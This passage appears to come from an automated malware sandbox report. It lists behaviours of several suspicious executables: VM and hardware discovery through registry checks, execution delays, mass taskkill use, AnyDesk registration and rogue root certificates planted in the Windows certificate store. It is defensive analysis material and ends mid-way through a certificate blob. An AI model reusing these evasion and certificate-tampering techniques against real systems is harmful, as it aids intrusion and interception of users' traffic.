N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\original.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\original.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\original.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\original.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\original.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\original.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\FuturesClient.exe = "11000" C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION\FuturesClient.exe = "1" C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\AnyDesk\AnyDesk.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --play \"%1\"" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" \"%1\"" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3350944739-639801879-157714471-1000\{3A8DC9F9-B29E-48C5-A534-888D43A36AF1} C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\",0" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360031003600440043003200320039002d0037003500450035002d0034003100410039002d0039004400330042002d003000460034003600420046003700320032003200310043007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b8
96321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c0
2b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340030003900380043004100410032002d0042004600420031002d0034004400360032002d0038003900350043002d004600410031003700300036004200410042003300460037007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c